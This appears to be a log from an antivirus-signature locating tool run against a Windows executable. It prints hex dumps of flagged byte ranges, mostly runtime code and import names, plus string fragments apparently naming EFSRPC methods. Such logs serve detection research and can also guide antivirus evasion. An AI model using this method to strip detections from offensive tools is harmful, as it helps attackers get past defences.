0000E1D0   45 BC FF FF 59 8B C6 8D 65 EC 5F 5E 5B 8B 4D FC    E...Y...e._^[.M.
0000E1E0   33 CD E8 F2 28 FF FF C9 C3 FF 75 20 FF 75 1C EB    3...(.....u .u..
0000E1F0   C0 57 E8 22 BC FF FF 59 EB D4 8B FF 55 8B EC 83    .W."...Y....U...
0000E200   EC 10 FF 75 08 8D 4D F0 E8 19 4A FF FF FF 75 28    ...u..M...J...u(
0000E210   8D 45 F4 FF 75 24 FF 75 20 FF 75 1C FF 75 18 FF    .E..u$.u .u..u..
0000E220   75 14 FF 75 10 FF 75 0C 50 E8 E2 FD FF FF 83 C4    u..u..u.P.......
0000E230   24 80 7D FC 00 74 0A 8B 4D F0 83 A1 50 03 00 00    $.}..t..M...P...
0000E240   FD C9 C3 E8 4C AC FF FF 33 C9 84 C0 0F 94 C1 8B    ....L...3.......
0000E250   C1 C3 8B FF 55 8B EC 83 3D 20 AF 41 00 00 56 75    ....U...= .A..Vu
0000E260   48 83 7D 08 00 75 17 E8 3F 7D FF FF C7 00 16 00    H.}..u..?}......
0000E270   00 00 E8 77 7C FF FF B8 FF FF FF 7F EB 3E 83 7D    ...w|........>.}
0000E280   0C 00 74 E3 BE FF FF FF 7F 39 75 10 76 14 E8 18    ..t......9u.v...
0000E290   7D FF FF C7 00 16 00 00 00 E8 50 7C FF FF 8B C6    }.........P|....
0000E2A0   EB 1A 5E 5D E9 D6 00 00 00 6A 00 FF 75 10 FF 75    ..^].....j..u..u
0000E2B0   0C FF 75 08 E8 06 00 00 00 83 C4 10 5E 5D C3 8B    ..u.........^]..
0000E2C0   FF 55 8B EC 83 EC 10 57 8B 7D 10 85 FF 75 07 33    .U.....W.}...u.3
0000E2D0   C0 E9 A6 00 00 00 83 7D 08 00 75 1A E8 CA 7C FF    .......}..u...|.
0000E2E0   FF C7 00 16 00 00 00 E8 02 7C FF FF B8 FF FF FF    .........|......
0000E2F0   7F E9 86 00 00 00 83 7D 0C 00 74 E0 56 BE FF FF    .......}..t.V...
0000E300   FF 7F 3B FE 76 12 E8 A0 7C FF FF C7 00 16 00 00    ..;.v...|.......
0000E310   00 E8 D8 7B FF FF EB 61 FF 75 14 8D 4D F0 E8 03    ...{...a.u..M...
[INFO    ][2023-07-21 13:35:26,425] _scanDataPart() :: Result: 58144-58416 (272b minChunk:256 X)
0000E320   49 FF FF 8B 45 F4 57 FF 75 0C 8B 80 A4 00 00 00    I...E.W.u.......
0000E330   85 C0 75 0F FF 75 08 E8 43 00 00 00 83 C4 0C 8B    ..u..u..C.......
0000E340   F0 EB 26 57 FF 75 08 68 01 10 00 00 50 E8 19 11    ..&W.u.h....P...
0000E350   00 00 83 C4 18 85 C0 75 0D E8 4D 7C FF FF C7 00    .......u..M|....
0000E360   16 00 00 00 EB 03 8D 70 FE 80 7D FC 00 74 0A 8B    .......p..}..t..
0000E370   4D F0 83 A1 50 03 00 00 FD 8B C6 5E 5F C9 C3 8B    M...P......^_...
0000E380   FF 55 8B EC 8B 4D 10 85 C9 75 04 33 C0 5D C3 53    .U...M...u.3.].S
0000E390   8B 5D 0C 56 57 8B 7D 08 0F B7 17 8D 42 BF 83 F8    .].VW.}.....B...
0000E3A0   19 77 03 83 C2 20 0F B7 33 83 C7 02 8D 46 BF 83    .w... ..3....F..
0000E3B0   F8 19 77 03 83 C6 20 8B C2 83 C3 02 2B C6 75 09    ..w... .....+.u.
0000E3C0   85 D2 74 05 83 E9 01 75 CF 5F 5E 5B 5D C3 8B FF    ..t....u._^[]...
0000E3D0   55 8B EC 83 7D 08 00 75 15 E8 CD 7B FF FF C7 00    U...}..u...{....
0000E3E0   16 00 00 00 E8 05 7B FF FF 83 C8 FF 5D C3 FF 75    ......{.....]..u
0000E3F0   08 6A 00 FF 35 B0 B3 41 00 FF 15 00 21 41 00 5D    .j..5..A....!A.]
0000E400   C3 8B FF 55 8B EC 57 8B 7D 08 85 FF 75 0B FF 75    ...U..W.}...u..u
0000E410   0C E8 21 86 FF FF 59 EB 24 56 8B 75 0C 85 F6 75    ..!...Y.$V.u...u
0000E420   09 57 E8 F4 7B FF FF 59 EB 10 83 FE E0 76 25 E8    .W..{..Y.....v%.
[INFO    ][2023-07-21 13:35:27,237] _printStatus() :: Reducing: 542 chunks done, found 63 matches (196 added)
[INFO    ][2023-07-21 13:35:27,238] _scanDataPart() :: Result: 62224-62496 (272b minChunk:256 X)
0000F310   E1 3F 8B C1 8B D1 D1 E8 33 F6 0F B6 C0 46 23 C6    .?......3....F#.
0000F320   23 D6 C1 E0 04 C1 E2 05 0B D0 8B C1 C1 E8 02 0F    #...............
0000F330   B6 C0 23 C6 C1 E0 03 0B D0 8B C1 C1 E8 03 0F B6    ..#.............
0000F340   C0 23 C6 C1 E0 02 0B D0 8B C1 C1 E8 04 0F B6 C0    .#..............
0000F350   23 C6 C1 E9 05 0B D0 0F B6 C1 23 C6 8D 7D E0 03    #.........#..}..
0000F360   C0 6A 07 0B D0 33 C0 59 F3 AB D9 75 E0 8B 4D E4    .j...3.Y...u..M.
0000F370   8B C1 33 C2 83 E0 3F 33 C8 89 4D E4 D9 65 E0 C1    ..3...?3..M..e..
0000F380   EB 18 83 E3 3F 8B C3 8B CB D1 E8 23 CE 0F B6 C0    ....?......#....
0000F390   23 C6 C1 E1 05 C1 E0 04 0B C8 8B C3 C1 E8 02 0F    #...............
0000F3A0   B6 C0 23 C6 C1 E0 03 0B C8 8B C3 C1 E8 03 0F B6    ..#.............
0000F3B0   C0 23 C6 C1 E0 02 0B C8 8B C3 C1 E8 04 0F B6 C0    .#..............
0000F3C0   23 C6 0B C8 C1 EB 05 0F B6 C3 23 C6 03 C0 5F 0B    #.........#..._.
0000F3D0   C8 39 35 18 AC 41 00 5E 5B 7C 16 0F AE 5D FC 8B    .95..A.^[|...]..
0000F3E0   45 FC 83 E1 3F 83 E0 C0 0B C1 89 45 FC 0F AE 55    E...?......E...U
0000F3F0   FC C9 C3 8B FF 55 8B EC FF 05 D0 AC 41 00 56 8B    .....U......A.V.
0000F400   75 08 57 6A 01 BF 00 10 00 00 57 E8 AE 6B FF FF    u.Wj......W..k..
0000F410   6A 00 89 46 04 E8 01 6C FF FF 83 C4 0C 8D 46 0C    j..F...l......F.
[INFO    ][2023-07-21 13:35:27,913] _scanDataPart() :: Result: 62496-63040 (544 bytes)
0000F420   83 7E 04 00 74 08 6A 40 59 F0 09 08 EB 11 B9 00    .~..t.j@Y.......
0000F430   04 00 00 F0 09 08 8D 46 14 6A 02 89 46 04 5F 89    .......F.j..F._.
0000F440   7E 18 8B 46 04 83 66 08 00 5F 89 06 5E 5D C3 8B    ~..F..f.._..^]..
0000F450   FF 55 8B EC 8B 4D 08 33 C0 38 01 74 0C 3B 45 0C    .U...M.3.8.t.;E.
0000F460   74 07 40 80 3C 08 00 75 F4 5D C3 8B FF 55 8B EC    t.@.<..u.]...U..
0000F470   56 8B 75 14 85 F6 7E 0D 56 FF 75 10 E8 1D 79 FF    V.u...~.V.u...y.
0000F480   FF 59 59 8B F0 8B 45 1C 85 C0 7E 0B 50 FF 75 18    .YY...E...~.P.u.
0000F490   E8 09 79 FF FF 59 59 85 F6 74 1E 85 C0 74 1A 33    ..y..YY..t...t.3
0000F4A0   C9 51 51 51 50 FF 75 18 56 FF 75 10 FF 75 0C FF    .QQQP.u.V.u..u..
0000F4B0   75 08 E8 76 6D FF FF EB 14 2B F0 75 05 6A 02 5E    u..vm....+.u.j.^
0000F4C0   EB 09 C1 FE 1F 83 E6 FE 83 C6 03 8B C6 5E 5D C3    .............^].
0000F4D0   33 C0 50 50 6A 03 50 6A 03 68 00 00 00 40 68 78    3.PPj.Pj.h...@hx
0000F4E0   70 41 00 FF 15 08 20 41 00 A3 A0 A8 41 00 C3 8B    pA.... A....A...
0000F4F0   0D A0 A8 41 00 83 F9 FE 75 0B E8 D1 FF FF FF 8B    ...A....u.......
0000F500   0D A0 A8 41 00 33 C0 83 F9 FF 0F 95 C0 C3 A1 A0    ...A.3..........
0000F510   A8 41 00 83 F8 FF 74 0C 83 F8 FE 74 07 50 FF 15    .A....t....t.P..
0000F520   40 20 41 00 C3 8B FF 55 8B EC 56 6A 00 FF 75 10    @ A....U..Vj..u.
0000F530   FF 75 0C FF 75 08 FF 35 A0 A8 41 00 FF 15 04 20    .u..u..5..A.... 
0000F540   41 00 8B F0 85 F6 75 2D FF 15 48 20 41 00 83 F8    A.....u-..H A...
0000F550   06 75 22 E8 B6 FF FF FF E8 73 FF FF FF 56 FF 75    .u"......s...V.u
0000F560   10 FF 75 0C FF 75 08 FF 35 A0 A8 41 00 FF 15 04    ..u..u..5..A....
0000F570   20 41 00 8B F0 8B C6 5E 5D C3 6A 0A FF 15 1C 20     A.....^].j.... 
0000F580   41 00 A3 F8 B3 41 00 33 C0 C3 CC CC CC CC CC CC    A....A.3........
0000F590   55 8B EC 83 EC 08 83 E4 F0 DD 1C 24 F3 0F 7E 04    U..........$..~.
0000F5A0   24 E8 08 00 00 00 C9 C3 66 0F 12 44 24 04 BA 00    $.......f..D$...
0000F5B0   00 00 00 66 0F 28 E8 66 0F 14 C0 66 0F 73 D5 34    ...f.(.f...f.s.4
0000F5C0   66 0F C5 CD 00 66 0F 28 0D 90 70 41 00 66 0F 28    f....f.(..pA.f.(
0000F5D0   15 A0 70 41 00 66 0F 28 1D 00 71 41 00 66 0F 28    ..pA.f.(..qA.f.(
0000F5E0   25 B0 70 41 00 66 0F 28 35 C0 70 41 00 66 0F 54    %.pA.f.(5.pA.f.T
0000F5F0   C1 66 0F 56 C3 66 0F 58 E0 66 0F C5 C4 00 25 F0    .f.V.f.X.f....%.
0000F600   07 00 00 66 0F 28 A0 C0 76 41 00 66 0F 28 B8 B0    ...f.(..vA.f.(..
0000F610   72 41 00 66 0F 54 F0 66 0F 5C C6 66 0F 59 F4 66    rA.f.T.f.\.f.Y.f
0000F620   0F 5C F2 F2 0F 58 FE 66 0F 59 C4 66 0F 28 E0 66    .\...X.f.Y.f.(.f
0000F630   0F 58 C6 81 E1 FF 0F 00 00 83 E9 01 81 F9 FD 07    .X..............
[INFO    ][2023-07-21 13:35:27,916] _scanDataPart() :: Result: 69568-69840 (272b minChunk:256 X)
00010FC0   D1 D8 0B DB 75 F4 F7 F1 8B F0 F7 64 24 1C 8B C8    ....u......d$...
00010FD0   8B 44 24 18 F7 E6 03 D1 72 0E 3B 54 24 14 77 08    .D$.....r.;T$.w.
00010FE0   72 0F 3B 44 24 10 76 09 4E 2B 44 24 18 1B 54 24    r.;D$.v.N+D$..T$
00010FF0   1C 33 DB 2B 44 24 10 1B 54 24 14 4D 79 07 F7 DA    .3.+D$..T$.My...
00011000   F7 D8 83 DA 00 8B CA 8B D3 8B D9 8B C8 8B C6 4F    ...............O
00011010   75 07 F7 DA F7 D8 83 DA 00 5D 5E 5F C2 10 00 CC    u........]^_....
00011020   80 F9 40 73 15 80 F9 20 73 06 0F A5 C2 D3 E0 C3    ..@s... s.......
00011030   8B D0 33 C0 80 E1 1F D3 E2 C3 33 C0 33 D2 C3 CC    ..3.......3.3...
00011040   80 F9 40 73 15 80 F9 20 73 06 0F AD D0 D3 EA C3    ..@s... s.......
00011050   8B C2 33 D2 80 E1 1F D3 E8 C3 33 C0 33 D2 C3 CC    ..3.......3.3...
00011060   51 8D 4C 24 08 2B C8 83 E1 0F 03 C1 1B C9 0B C1    Q.L$.+..........
00011070   59 E9 1A 00 00 00 51 8D 4C 24 08 2B C8 83 E1 07    Y.....Q.L$.+....
00011080   03 C1 1B C9 0B C1 59 E9 04 00 00 00 CC CC CC CC    ......Y.........
00011090   51 8D 4C 24 04 2B C8 1B C0 F7 D0 23 C8 8B C4 25    Q.L$.+.....#...%
000110A0   00 F0 FF FF 3B C8 72 0A 8B C1 59 94 8B 00 89 04    ....;.r...Y.....
000110B0   24 C3 2D 00 10 00 00 85 00 EB E9 CC CC CC CC CC    $.-.............
000110C0   E9 0B 00 00 00 CC CC CC CC CC CC CC CC CC CC CC    ................
[INFO    ][2023-07-21 13:35:27,916] scan() :: Reducer Result: Time:58 Chunks:548 MatchesAdded:199 MatchesFinal:65
[INFO    ][2023-07-21 13:35:29,966] scanForMatchesInPe() :: Launching bytes analysis on section: .rdata (70656-101888)
[INFO    ][2023-07-21 13:35:29,966] scan() :: Reducer Start: ScanSpeed:Normal Iteration:1 MinChunkSize:2 MinMatchSize:4
[INFO    ][2023-07-21 13:35:29,966] _printStatus() :: Reducing: 549 chunks done, found 0 matches (199 added)
[INFO    ][2023-07-21 13:35:32,583] _printStatus() :: Reducing: 559 chunks done, found 0 matches (199 added)
[INFO    ][2023-07-21 13:35:35,178] _printStatus() :: Reducing: 562 chunks done, found 0 matches (199 added)
[INFO    ][2023-07-21 13:35:35,178] _scanDataPart() :: Result: 70656-70659 (3b minChunk:2 X)
00011400   70 97 01                                           p..
[INFO    ][2023-07-21 13:35:37,666] _printStatus() :: Reducing: 566 chunks done, found 1 matches (200 added)
[INFO    ][2023-07-21 13:35:40,421] _printStatus() :: Reducing: 569 chunks done, found 1 matches (200 added)
[INFO    ][2023-07-21 13:35:40,421] _scanDataPart() :: Result: 70930-70933 (3b minChunk:2 X)
00011512   01 00 72                                           ..r
[INFO    ][2023-07-21 13:35:40,421] _scanDataPart() :: Result: 70933-70937 (4b minChunk:2 X)
00011515   94 01 00 60                                        ...`
[INFO    ][2023-07-21 13:35:41,311] _scanDataPart() :: Result: 70941-70945 (4b minChunk:2 X)
0001151D   00 00 00 80                                        ....
[INFO    ][2023-07-21 13:35:42,724] _scanDataPart() :: Result: 70945-70953 (8 bytes)
00011521   1D 40 00 00 00 00 00 9A                            .@......
[INFO    ][2023-07-21 13:35:42,724] _printStatus() :: Reducing: 575 chunks done, found 3 matches (204 added)
[INFO    ][2023-07-21 13:35:42,724] _scanDataPart() :: Result: 70953-70957 (4b minChunk:2 X)
00011529   17 40 00 00                                        .@..
[INFO    ][2023-07-21 13:35:45,308] _printStatus() :: Reducing: 580 chunks done, found 3 matches (205 added)
[INFO    ][2023-07-21 13:35:46,138] _scanDataPart() :: Result: 70972-70976 (4b minChunk:2 X)
0001153C   40 31 40 00                                        @1@.
[INFO    ][2023-07-21 13:35:47,529] _printStatus() :: Reducing: 591 chunks done, found 4 matches (206 added)
[INFO    ][2023-07-21 13:35:48,414] _scanDataPart() :: Result: 75048-75051 (3b minChunk:2 X)
00012528   62 70 40                                           bp@
[INFO    ][2023-07-21 13:35:50,002] _scanDataPart() :: Result: 75070-75078 (8 bytes)
0001253E   40 00 40 AE 40 00 51 AE                            @.@.@.Q.
[INFO    ][2023-07-21 13:35:50,002] _printStatus() :: Reducing: 595 chunks done, found 6 matches (208 added)
[INFO    ][2023-07-21 13:35:52,195] _scanDataPart() :: Result: 75085-75093 (8 bytes)
0001254D   60 40 00 98 80 40 00 C4                            `@...@..
[INFO    ][2023-07-21 13:35:52,196] _printStatus() :: Reducing: 598 chunks done, found 7 matches (209 added)
[INFO    ][2023-07-21 13:35:53,777] _scanDataPart() :: Result: 75093-75101 (8 bytes)
00012555   80 40 00 AB 75 40 00 0B                            .@..u@..
[INFO    ][2023-07-21 13:35:53,777] _scanDataPart() :: Doubling: minChunkSize: 2  minMatchSize: 4
[INFO    ][2023-07-21 13:35:54,672] _printStatus() :: Reducing: 606 chunks done, found 7 matches (210 added)
[INFO    ][2023-07-21 13:35:57,147] _printStatus() :: Reducing: 609 chunks done, found 7 matches (210 added)
[INFO    ][2023-07-21 13:35:59,041] _scanDataPart() :: Result: 97480-97488 (8b minChunk:4 X)
00017CC8   53 00 72 00 76 00 0A 00                            S.r.v...
[INFO    ][2023-07-21 13:35:59,042] _scanDataPart() :: Result: 97488-97496 (8b minChunk:4 X)
00017CD0   00 00 00 00 34 00 3A 00                            ....4.:.
[INFO    ][2023-07-21 13:35:59,984] _printStatus() :: Reducing: 614 chunks done, found 8 matches (212 added)
[INFO    ][2023-07-21 13:36:02,244] _printStatus() :: Reducing: 617 chunks done, found 8 matches (212 added)
[INFO    ][2023-07-21 13:36:03,909] _scanDataPart() :: Result: 97526-97541 (15 bytes)
00017CF6   72 00 73 00 4F 00 6E 00 46 00 69 00 6C 00 65       r.s.O.n.F.i.l.e
[INFO    ][2023-07-21 13:36:04,616] _scanDataPart() :: Result: 97541-97557 (16 bytes)
00017D05   00 0A 00 00 00 00 00 35 00 3A 00 20 00 45 00 66    .......5.:. .E.f
[INFO    ][2023-07-21 13:36:04,616] _printStatus() :: Reducing: 620 chunks done, found 9 matches (214 added)
[INFO    ][2023-07-21 13:36:07,128] _printStatus() :: Reducing: 623 chunks done, found 9 matches (214 added)
[INFO    ][2023-07-21 13:36:07,128] _scanDataPart() :: Result: 97602-97610 (8b minChunk:4 X)
00017D42   73 00 0A 00 00 00 36 00                            s.....6.
[INFO    ][2023-07-21 13:36:09,783] _printStatus() :: Reducing: 627 chunks done, found 10 matches (215 added)
[INFO    ][2023-07-21 13:36:10,489] _scanDataPart() :: Result: 97648-97663 (15 bytes)
00017D70   46 00 72 00 6F 00 6D 00 46 00 69 00 6C 00 65       F.r.o.m.F.i.l.e
[INFO    ][2023-07-21 13:36:11,205] _scanDataPart() :: Result: 97663-97679 (16 bytes)
00017D7F   00 0A 00 00 00 36 00 3A 00 20 00 45 00 66 00 73    .....6.:. .E.f.s
[INFO    ][2023-07-21 13:36:11,872] _printStatus() :: Reducing: 632 chunks done, found 11 matches (217 added)
[INFO    ][2023-07-21 13:36:14,084] _printStatus() :: Reducing: 635 chunks done, found 11 matches (217 added)
[INFO    ][2023-07-21 13:36:16,097] _printStatus() :: Reducing: 638 chunks done, found 11 matches (217 added)
[INFO    ][2023-07-21 13:36:16,097] _scanDataPart() :: Result: 100111-100119 (8b minChunk:4 X)
0001870F   00 C0 94 01 00 0C 21 01                            ......!.
[INFO    ][2023-07-21 13:36:18,339] _printStatus() :: Reducing: 642 chunks done, found 12 matches (218 added)
[INFO    ][2023-07-21 13:36:18,339] _scanDataPart() :: Result: 100126-100134 (8b minChunk:4 X)
0001871E   00 00 00 00 00 00 FA 95                            ........
[INFO    ][2023-07-21 13:36:18,340] _scanDataPart() :: Result: 100134-100141 (7b minChunk:4 X)
00018726   01 00 00 20 01 00 00                               ... ...
[INFO    ][2023-07-21 13:36:19,015] _scanDataPart() :: Result: 100156-100164 (8b minChunk:4 X)
0001873C   00 00 00 00 70 97 01 00                            ....p...
[INFO    ][2023-07-21 13:36:19,729] _scanDataPart() :: Result: 100164-100180 (16 bytes)
00018744   84 99 01 00 76 99 01 00 CC 94 01 00 E8 94 01 00    ....v...........
[INFO    ][2023-07-21 13:36:20,415] _printStatus() :: Reducing: 650 chunks done, found 14 matches (222 added)
[INFO    ][2023-07-21 13:36:22,462] _printStatus() :: Reducing: 653 chunks done, found 14 matches (222 added)
[INFO    ][2023-07-21 13:36:23,102] _scanDataPart() :: Result: 100180-100195 (15 bytes)
00018754   06 95 01 00 1A 95 01 00 2E 95 01 00 4A 95 01       ............J..
[INFO    ][2023-07-21 13:36:23,767] _scanDataPart() :: Result: 100195-100210 (15 bytes)
00018763   00 64 95 01 00 7A 95 01 00 90 95 01 00 AA 95       .d...z.........
[INFO    ][2023-07-21 13:36:25,032] _scanDataPart() :: Result: 100210-100225 (15 bytes)
00018772   01 00 C0 95 01 00 D4 95 01 00 E6 95 01 00 68       ..............h
[INFO    ][2023-07-21 13:36:25,033] _printStatus() :: Reducing: 657 chunks done, found 14 matches (225 added)
[INFO    ][2023-07-21 13:36:25,696] _scanDataPart() :: Result: 100225-100241 (16 bytes)
00018781   99 01 00 08 96 01 00 14 96 01 00 24 96 01 00 34    ...........$...4
[INFO    ][2023-07-21 13:36:27,095] _printStatus() :: Reducing: 660 chunks done, found 14 matches (226 added)
[INFO    ][2023-07-21 13:36:27,746] _scanDataPart() :: Result: 100241-100256 (15 bytes)
00018791   96 01 00 4C 96 01 00 64 96 01 00 7C 96 01 00       ...L...d...|...
[INFO    ][2023-07-21 13:36:28,421] _scanDataPart() :: Result: 100256-100271 (15 bytes)
000187A0   A4 96 01 00 B0 96 01 00 BE 96 01 00 CC 96 01       ...............
[INFO    ][2023-07-21 13:36:29,644] _scanDataPart() :: Result: 100271-100286 (15 bytes)
000187AF   00 D6 96 01 00 E4 96 01 00 F6 96 01 00 08 97       ...............
[INFO    ][2023-07-21 13:36:29,644] _printStatus() :: Reducing: 664 chunks done, found 14 matches (229 added)
[INFO    ][2023-07-21 13:36:30,346] _scanDataPart() :: Result: 100286-100302 (16 bytes)
000187BE   01 00 1A 97 01 00 2A 97 01 00 36 97 01 00 4C 97    ......*...6...L.
[INFO    ][2023-07-21 13:36:31,666] _printStatus() :: Reducing: 667 chunks done, found 14 matches (230 added)
[INFO    ][2023-07-21 13:36:32,993] _scanDataPart() :: Result: 100302-100317 (15 bytes)
000187CE   01 00 5A 97 01 00 94 99 01 00 82 97 01 00 94       ..Z............
[INFO    ][2023-07-21 13:36:33,671] _scanDataPart() :: Result: 100317-100332 (15 bytes)
000187DD   97 01 00 A0 97 01 00 AC 97 01 00 BE 97 01 00       ...............
[INFO    ][2023-07-21 13:36:33,672] _printStatus() :: Reducing: 670 chunks done, found 14 matches (232 added)
[INFO    ][2023-07-21 13:36:35,015] _scanDataPart() :: Result: 100332-100347 (15 bytes)
000187EC   CE 97 01 00 DC 97 01 00 E8 97 01 00 FC 97 01       ...............
[INFO    ][2023-07-21 13:36:35,725] _scanDataPart() :: Result: 100347-100363 (16 bytes)
000187FB   00 0C 98 01 00 1E 98 01 00 28 98 01 00 34 98 01    .........(...4..
[INFO    ][2023-07-21 13:36:35,726] _printStatus() :: Reducing: 673 chunks done, found 14 matches (234 added)
[INFO    ][2023-07-21 13:36:37,784] _scanDataPart() :: Result: 100363-100378 (15 bytes)
0001880B   00 40 98 01 00 56 98 01 00 6C 98 01 00 86 98       .@...V...l.....
[INFO    ][2023-07-21 13:36:37,784] _printStatus() :: Reducing: 676 chunks done, found 14 matches (235 added)
[INFO    ][2023-07-21 13:36:38,445] _scanDataPart() :: Result: 100378-100393 (15 bytes)
0001881A   01 00 A0 98 01 00 BA 98 01 00 CA 98 01 00 DC       ...............
[INFO    ][2023-07-21 13:36:40,199] _printStatus() :: Reducing: 679 chunks done, found 14 matches (236 added)
[INFO    ][2023-07-21 13:36:40,199] _scanDataPart() :: Result: 100393-100400 (7b minChunk:4 X)
00018829   98 01 00 EE 98 01 00                               .......
[INFO    ][2023-07-21 13:36:42,386] _printStatus() :: Reducing: 683 chunks done, found 14 matches (237 added)
[INFO    ][2023-07-21 13:36:44,843] _printStatus() :: Reducing: 686 chunks done, found 14 matches (237 added)
[INFO    ][2023-07-21 13:36:44,843] _scanDataPart() :: Result: 100583-100591 (8b minChunk:4 X)
000188E7   00 71 05 53 65 74 55 6E                            .q.SetUn
[INFO    ][2023-07-21 13:36:45,534] _scanDataPart() :: Result: 100591-100607 (16 bytes)
000188EF   68 61 6E 64 6C 65 64 45 78 63 65 70 74 69 6F 6E    handledException
[INFO    ][2023-07-21 13:36:47,039] _printStatus() :: Reducing: 690 chunks done, found 15 matches (239 added)
[INFO    ][2023-07-21 13:36:47,849] _scanDataPart() :: Result: 100607-100614 (7b minChunk:4 X)
000188FF   46 69 6C 74 65 72 00                               Filter.
[INFO    ][2023-07-21 13:36:49,402] _scanDataPart() :: Result: 100652-100668 (16 bytes)
0001892C   00 00 89 03 49 73 50 72 6F 63 65 73 73 6F 72 46    ....IsProcessorF
[INFO    ][2023-07-21 13:36:49,402] _printStatus() :: Reducing: 694 chunks done, found 16 matches (241 added)
[INFO    ][2023-07-21 13:36:51,476] _printStatus() :: Reducing: 697 chunks done, found 16 matches (241 added)
[INFO    ][2023-07-21 13:36:52,863] _scanDataPart() :: Result: 100668-100683 (15 bytes)
0001893C   65 61 74 75 72 65 50 72 65 73 65 6E 74 00 4F       eaturePresent.O
[INFO    ][2023-07-21 13:36:53,542] _scanDataPart() :: Result: 100683-100698 (15 bytes)
0001894B   04 51 75 65 72 79 50 65 72 66 6F 72 6D 61 6E       .QueryPerforman
[INFO    ][2023-07-21 13:36:53,543] _printStatus() :: Reducing: 700 chunks done, found 16 matches (243 added)
[INFO    ][2023-07-21 13:36:53,543] _scanDataPart() :: Doubling: minChunkSize: 4  minMatchSize: 8
[INFO    ][2023-07-21 13:36:54,253] _scanDataPart() :: Result: 100698-100729 (31 bytes)
0001895A   63 65 43 6F 75 6E 74 65 72 00 1B 02 47 65 74 43    ceCounter...GetC
0001896A   75 72 72 65 6E 74 50 72 6F 63 65 73 73 49 64       urrentProcessId
[INFO    ][2023-07-21 13:36:55,614] _scanDataPart() :: Result: 100729-100759 (30 bytes)
00018979   00 1F 02 47 65 74 43 75 72 72 65 6E 74 54 68 72    ...GetCurrentThr
00018989   65 61 64 49 64 00 00 EC 02 47 65 74 53 79          eadId....GetSy
[INFO    ][2023-07-21 13:36:55,614] _printStatus() :: Reducing: 703 chunks done, found 16 matches (245 added)
[INFO    ][2023-07-21 13:36:56,221] _scanDataPart() :: Result: 100759-100790 (31 bytes)
00018997   73 74 65 6D 54 69 6D 65 41 73 46 69 6C 65 54 69    stemTimeAsFileTi
000189A7   6D 65 00 66 03 49 6E 69 74 69 61 6C 69 7A 65       me.f.Initialize
[INFO    ][2023-07-21 13:36:57,620] _printStatus() :: Reducing: 706 chunks done, found 16 matches (246 added)
[INFO    ][2023-07-21 13:36:58,504] _scanDataPart() :: Result: 100790-100805 (15b minChunk:8 X)
000189B6   53 4C 69 73 74 48 65 61 64 00 82 03 49 73 44       SListHead...IsD
[INFO    ][2023-07-21 13:36:59,181] _scanDataPart() :: Result: 100820-100851 (31 bytes)
000189D4   D3 02 47 65 74 53 74 61 72 74 75 70 49 6E 66 6F    ..GetStartupInfo
000189E4   57 00 7B 02 47 65 74 4D 6F 64 75 6C 65 48 61       W.{.GetModuleHa
[INFO    ][2023-07-21 13:36:59,839] _printStatus() :: Reducing: 710 chunks done, found 17 matches (248 added)
[INFO    ][2023-07-21 13:37:00,673] _scanDataPart() :: Result: 100851-100866 (15b minChunk:8 X)
000189F3   6E 64 6C 65 57 00 00 4B 45 52 4E 45 4C 33 32       ndleW..KERNEL32
[INFO    ][2023-07-21 13:37:01,316] _scanDataPart() :: Result: 100881-100912 (31 bytes)
00018A11   6E 64 00 64 02 47 65 74 4C 61 73 74 45 72 72 6F    nd.d.GetLastErro
00018A21   72 00 00 34 05 53 65 74 4C 61 73 74 45 72 72       r..4.SetLastErr
[INFO    ][2023-07-21 13:37:02,006] _printStatus() :: Reducing: 714 chunks done, found 18 matches (250 added)
[INFO    ][2023-07-21 13:37:04,192] _printStatus() :: Reducing: 717 chunks done, found 18 matches (250 added)
[INFO    ][2023-07-21 13:37:05,588] _scanDataPart() :: Result: 100912-100942 (30 bytes)
00018A30   6F 72 00 00 34 01 45 6E 74 65 72 43 72 69 74 69    or..4.EnterCriti
00018A40   63 61 6C 53 65 63 74 69 6F 6E 00 00 C1 03          calSection....
[INFO    ][2023-07-21 13:37:06,265] _scanDataPart() :: Result: 100942-100973 (31 bytes)
00018A4E   4C 65 61 76 65 43 72 69 74 69 63 61 6C 53 65 63    LeaveCriticalSec
00018A5E   74 69 6F 6E 00 00 13 01 44 65 6C 65 74 65 43       tion....DeleteC
[INFO    ][2023-07-21 13:37:06,265] _printStatus() :: Reducing: 720 chunks done, found 18 matches (252 added)
[INFO    ][2023-07-21 13:37:08,953] _printStatus() :: Reducing: 723 chunks done, found 18 matches (252 added)
[INFO    ][2023-07-21 13:37:08,953] _scanDataPart() :: Result: 101034-101049 (15b minChunk:8 X)
00018AAA   6C 6C 6F 63 00 00 A4 05 54 6C 73 47 65 74 56       lloc....TlsGetV
[INFO    ][2023-07-21 13:37:08,954] _scanDataPart() :: Result: 101049-101064 (15b minChunk:8 X)
00018AB9   61 6C 75 65 00 A5 05 54 6C 73 53 65 74 56 61       alue...TlsSetVa
[INFO    ][2023-07-21 13:37:09,919] _scanDataPart() :: Result: 101064-101079 (15b minChunk:8 X)
00018AC8   6C 75 65 00 A3 05 54 6C 73 46 72 65 65 00 AE       lue...TlsFree..
[INFO    ][2023-07-21 13:37:09,919] _scanDataPart() :: Result: 101079-101095 (16b minChunk:8 X)
00018AD7   01 46 72 65 65 4C 69 62 72 61 72 79 00 B1 02 47    .FreeLibrary...G
[INFO    ][2023-07-21 13:37:11,284] _scanDataPart() :: Result: 101095-101125 (30 bytes)
00018AE7   65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 C7    etProcAddress...
00018AF7   03 4C 6F 61 64 4C 69 62 72 61 72 79 45 78          .LoadLibraryEx
[INFO    ][2023-07-21 13:37:11,284] _printStatus() :: Reducing: 730 chunks done, found 19 matches (257 added)
[INFO    ][2023-07-21 13:37:11,923] _scanDataPart() :: Result: 101125-101156 (31 bytes)
00018B05   57 00 00 64 04 52 61 69 73 65 45 78 63 65 70 74    W..d.RaiseExcept
00018B15   69 6F 6E 00 00 D5 02 47 65 74 53 74 64 48 61       ion....GetStdHa
[INFO    ][2023-07-21 13:37:13,936] _printStatus() :: Reducing: 734 chunks done, found 19 matches (258 added)
[INFO    ][2023-07-21 13:37:14,617] _scanDataPart() :: Result: 101156-101186 (30 bytes)
00018B24   6E 64 6C 65 00 00 16 06 57 72 69 74 65 46 69 6C    ndle....WriteFil
00018B34   65 00 77 02 47 65 74 4D 6F 64 75 6C 65 46          e.w.GetModuleF
[INFO    ][2023-07-21 13:37:15,473] _scanDataPart() :: Result: 101186-101201 (15b minChunk:8 X)
00018B42   69 6C 65 4E 61 6D 65 57 00 00 61 01 45 78 69       ileNameW..a.Exi
